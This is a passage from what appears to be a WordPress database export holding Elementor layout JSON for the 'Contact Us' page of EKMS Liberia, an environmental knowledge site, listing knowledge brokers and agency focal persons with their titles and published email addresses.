blet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(16048,2425,'_elementor_edit_mode','builder'),(16049,2425,'_elementor_template_type','wp-page'),(16050,2425,'_elementor_version','2.7.5'),(16051,2425,'_wp_page_template','default'),(16052,2425,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0